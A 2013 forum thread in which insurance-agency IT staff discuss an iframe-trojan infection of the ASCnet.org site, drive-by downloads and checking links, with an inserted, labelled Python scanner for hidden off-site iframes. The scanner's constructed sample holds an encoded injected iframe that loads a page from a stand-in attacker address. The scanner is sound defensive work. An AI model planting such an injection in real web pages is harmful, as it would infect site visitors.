Warning! The ASCnet site may be infected with a virus.

Started by Ben Thoele, February 18, 2013, 11:32:32 AM


Ben Thoele

Sophos AV kicks out the following warning when I visit the ASCnet site.

   Virus/spyware 'Troj/Iframe-JG' has been detected at "www.ascnet.org/AM/HierMenu/HM_ScriptDOM.js"

Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Ben Thoele

Sophos Labs confirmed that ASCnet.org is infected with Troj/Iframe-JG.

Aaron over at ASCnet is working with their web hosting provider to get it resolved.  He said he would email me when it's fixed.   I will follow-up when I hear from him.

Charlie Charbonneau

Yikes!   Is that the free stoof you get with membership?!
Charlie Charbonneau
GBMB Insurance
San Antonio TX.

EPIC 2022, CSR24, Windows 2012 Hyper-V & 2016, Win10/11 Pro Stations, Sophos Anti-Virus.

DebAmstutz

Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.
Deb Amstutz
Missing TAM 5 days a week

Jim Jensen

Deb, lots of websites have malicious software that has become embedded in them. A lot of sites run small programs (scripts) in order to make them look nice or have certain functionality. Some use Java, while others use Flash. These scripts run on your computer. This is why you've seen the warnings about issues with Java and that you need to either disable it or apply a patch (when they are available). If someone infiltrates a website and leaves behind malicious code, it can run on yours just by going to the website. Email is only one way to obtain a nasty on your computer.
Jim Jensen
CIC, CEO, CIO, COO, CFO, Producer, CSR, Claims Handler, janitor....whatever else.
Jensen Ford Insurance
Indianapolis

Ben Thoele

Quote from: DebAmstutz on February 18, 2013, 12:37:26 PM
Here are a couple of questions from someone not well-versed on the topic of virii.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any virii on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.

Here is a great You Tube Video I showed our staff to help understand this.
http://www.youtube.com/watch?v=EK6BBYmiVpo&feature=share&list=PL4E9816850A80ED8E

I wouldn't visit ASCnet, for now, unless you are prepared to reload your computer. And that's the rule of thumb I use for all internet browsing at work: is the site "work related" and/or am I willing to deal with the repercussions? Since there is no 100% safe web surfing, I advise users to browse based on a cost/benefit analysis. Is the site I'm going to worth the potential risk to my work computer? If a user is infected from a vacation site, then they are in trouble. If they get a virus from Travelers.com then they are O.K. because that's a cost of doing business. Hopefully you're not paying to rebuild computers so your employees can plan their vacations at work.



Marie (Zionkowski) Gozikowski

Ben - what a great link... thanks for posting it!  I am going to have my users watch them all :-)
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Ben Thoele

Quote from: Lynne Desrochers on February 18, 2013, 01:17:07 PM
Hey, how do we know that link is safe?  : )
Good question. I look at the domain; in this case it's www.youtube.com, which I trust. If I receive an insurance marketing email and the link points to www.hellspawn.com I don't click on it. If you can't see the link you can "mouse over" or hover over the link to see where it points. This way you can inspect the link before you click on it. An email from Travelers.com should include links to www.Travelers.com/whatever, not to www.russianmalwarehost.com/virus or whatever.

Does that help? 

Marie (Zionkowski) Gozikowski

I have Youtube blocked at work, but it looks like you can also view these videos directly from Sophos' site:

http://www.sophos.com/en-us/security-news-trends/anatomy-of-an-attack.aspx

Ben Thoele

Looks like the ASCnet site is fixed for now. At least they made a change, and when I go there it doesn't set off our AV.

Surf at your own risk!

Bloody Jack Kidd

It can happen to many sites, although often enough the malicious content is actually served from a site other than the one you are visiting. In this case it could be a few things, like Sophos getting a bit too paranoid, in which case the JavaScript in question may not be as dangerous as this makes it appear.

Another possibility is that the site has been compromised and malicious code has been planted there.

I would point a finger and snicker, but this can and does happen to even the most well-run and secure sites. In fact, recently Bit9, a company on the bleeding edge of application whitelisting, got hacked and delivered malware out to their own clients.
Sysadmin - Parallel42

Gene Foraker

I don't know how the message board gets a virus, but don't forget that there is a "files" area where you can download files. There may have been something there.
Gene Foraker CPCU
Gates-Foraker Insurance Agency
Norton, OH


My posts are a natural hand made product. The slight variations in spelling and grammar enhance its individual character and beauty and in no way are to be considered flaws or defects.

Mark

Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Quote from: Mark on February 19, 2013, 11:00:53 AM
Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.

Browser/platform ID is a very common JavaScript trick; there is nothing malicious about that in and of itself, but malicious sites looking to exploit a system will often first determine what you are running and then deliver the appropriate payload.
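Added example, not a post from the thread and not the real HM_ScriptDOM.js or any ASCnet code: a small scanner for the kind of thing Jim Jensen and Bloody Jack Kidd describe above, a legitimate browser-detection script with a hidden, off-site iframe planted in it. The injected tag is almost always percent-encoded inside an unescape("...") call so that a plain search for "<iframe" finds nothing, so the scanner decodes string literals first, then reports any iframe that points off the site and is sized or styled so a visitor would never see it. The browser-detection flag is reported separately as context, since, as noted above, that check by itself is normal for a menu script. The sample script and the 203.0.113.7 address are constructed for the demonstration.

```python
"""Flag injected hidden <iframe> tags in a JavaScript or HTML file.

Quoted string literals are percent-decoded first, because injected iframes
are usually written as unescape("%3Ciframe...") so a grep for "<iframe"
misses them.
"""
import re
from urllib.parse import unquote, urlparse

# Constructed sample, NOT the real HM_ScriptDOM.js: a benign browser-detection
# menu script with an injected document.write() appended at the end.
# 203.0.113.7 is a documentation address standing in for an attacker host.
SAMPLE_JS = r'''
var HM_IE = (navigator.userAgent.indexOf("MSIE") != -1);
var HM_NS = (navigator.userAgent.indexOf("Netscape") != -1);
function HM_f_ShowMenu(id) { /* legitimate menu code */ }
document.write(unescape("%3Ciframe src=%22http://203.0.113.7/in.php%22 width=1 height=1 style=%22visibility:hidden%22%3E%3C/iframe%3E"));
'''

HIDING_STYLES = ("display:none", "visibility:hidden")


def decode_js_strings(text):
    """Return the text plus percent-decoded copies of its quoted literals."""
    decoded = []
    for m in re.finditer(r'(["\'])((?:\\.|(?!\1).)*)\1', text):
        literal = m.group(2)
        if "%" in literal:
            decoded.append(unquote(literal))
    return text + "\n" + "\n".join(decoded)


def parse_attrs(tag):
    """Minimal attribute parser for a single '<tag ...>' string."""
    attrs = {}
    for m in re.finditer(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', tag):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def hiding_reasons(attrs):
    """List why a visitor would not see this iframe on the page."""
    reasons = []
    for dim in ("width", "height"):
        value = attrs.get(dim, "").rstrip("px")
        if value.isdigit() and int(value) <= 1:
            reasons.append(f"{dim}={attrs[dim]}")
    style = attrs.get("style", "").replace(" ", "").lower()
    reasons += [f"style:{s}" for s in HIDING_STYLES if s in style]
    if re.search(r"(top|left):-\d", style):
        reasons.append("off-screen position")
    return reasons


def scan_script(text, site_host):
    """Report hidden off-site iframes and whether the file fingerprints the browser."""
    findings = []
    for m in re.finditer(r"<iframe\b[^>]*>", decode_js_strings(text), re.I):
        attrs = parse_attrs(m.group(0))
        src = attrs.get("src", "")
        # A relative src stays on the site being scanned.
        host = (urlparse(src).hostname or site_host).lower()
        reasons = hiding_reasons(attrs)
        if host != site_host.lower() and reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return {
        "hidden_iframes": findings,
        # Normal for a menu script; only meaningful next to a hidden iframe.
        "browser_detection": bool(
            re.search(r"navigator\.(userAgent|appName|platform)", text)
        ),
    }


if __name__ == "__main__":
    print(scan_script(SAMPLE_JS, "www.ascnet.org"))
```

A visible, same-site iframe (say a 400x300 menu frame with a relative src) produces no finding, which is the point: the combination of off-site plus invisible is what separates a drive-by injection from ordinary page plumbing.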

Mark

Right.  I just wgot it a few minutes ago and looked at it just to see what it was.  I assume it's been cleaned/replaced already.


Bob

I noticed the same thing last week. AV stopped it cold, but it popped up visiting Community. Ironic, I just mentioned this possibility, but Java, not JavaScript, and whether the board could infect members. ???

Bloody Jack Kidd

I am curious if it really was bad js and if so, how did it get there. It opens up some pretty scary scenarios.

Mark

Quote from: Bloody Jack Kidd on February 19, 2013, 02:00:58 PM
I am curious if it really was bad js and if so, how did it get there. It opens up some pretty scary scenarios.

Right.  Was the server compromised and that script edited to obtain malware from somewhere, or what happened?

I know that ASCnet.org uses ColdFusion and there have been exploits for that in the past. Not familiar with ColdFusion, so I don't know how to tell if it's up to date or not. Also, the Community and the website are not hosted at the same location. Socious hosts out of Kansas City and ascnet.org looks to be in Washington DC.

So, www.ascnet.org running ColdFusion does not directly affect community.ascnet.org running Socious.

Bloody Jack Kidd

ah, so it was the coldfusion site?

that would not be surprising then - I had looked at that in the past and thought to myself - "oh boy, it's just a matter of time..."

Mark

Quote from: Bloody Jack Kidd on February 19, 2013, 03:07:32 PM
that would not be surprising then - I had looked at that in the past and thought to myself - "oh boy, it's just a matter of time..."

HAHAHAHA.  Yep.

DebAmstutz

So it's safe to go to ascnet.org now? 

Also, I received email yesterday from one of the ascnet employees regarding an upcoming chapter meeting. I have not opened it, having read the warning here first. Do you think I should ask for the email to be resent, or would email from ascnet.org yesterday, before the problem was fixed, be OK to open? I know there are attachments, but they would be PDFs as they are handouts.

Mark

I wouldn't expect the email to be infected if it were me.

Bob

Appears to be ok now.  I'm not getting any alerts like I did last Friday.

DebAmstutz

I'm getting a "This website has experienced an unexpected error" message just now when I tried to go there.  Perhaps there is a bigger problem?

Bloody Jack Kidd

not looking good...

...and the error is leaking info you don't want to be leaked, like file structure and user accounts.


Ric

Guess it was a good day to be off Monday; I have been playing catch up ever since. Still have not gotten caught up. Is the ASCnet site clean yet?
Ric Tucker
Manager of Information Systems
Past President, New Jersey Chapter

J A Mariano Agency
TAM 2020, 11users, Windows 2019 Server,
Windows 10 Pro 64-bit workstations
fax@vantage 9.0.5,
Acoustic guitar, drums, percussion
Chrome, Microsoft 365

Bloody Jack Kidd

Can't tell if it's clean, apparently it is broken to some degree.

Mark

ASCnet site is down.  Aaron says it's "Managed Web" so he has no access.  I'm guessing that means all he can do is submit a ticket and wait?  I hate not having full control over my stuff.


Bloody Jack Kidd

Maybe now is a good time to offer them a deal on hosting.

:-\

Mark

Quote from: Bloody Jack Kidd on February 20, 2013, 09:21:52 AM
Maybe now is a good time to offer them a deal on hosting.

:-\

Maybe, but I don't know that I'd want to host a ColdFusion site...

Bloody Jack Kidd

Quote from: Mark on February 20, 2013, 09:25:02 AM
Maybe, but I don't know that I'd want to host a ColdFusion site...

I could put it in a jail...

Mark

Website is back, but this is what I'm getting:

Scan type: Auto-Protect Scan
Event: Risk Found!
Security risk detected: IFrame.Exploit
File: C:\Documents and Settings\...\Local Settings\Application Data\Mozilla\Firefox\Profiles\ivo2rvzr.default\Cache\8\0C\D7AE9d01
Location: C:\Documents and Settings\...\Local Settings\Application Data\Mozilla\Firefox\Profiles\ivo2rvzr.default\Cache\8\0C
Computer: ...
User: ...
Action taken: Pending Side Effects Analysis : Access denied
Date found: Wednesday, February 20, 2013  8:40:46 AM

Jim Jensen

See - I told you they'd fall apart without me when I let my membership lapse... ;D

Mark

Aaron is aware of the iFrame exploit, as we would all expect him to be, and he is on it.
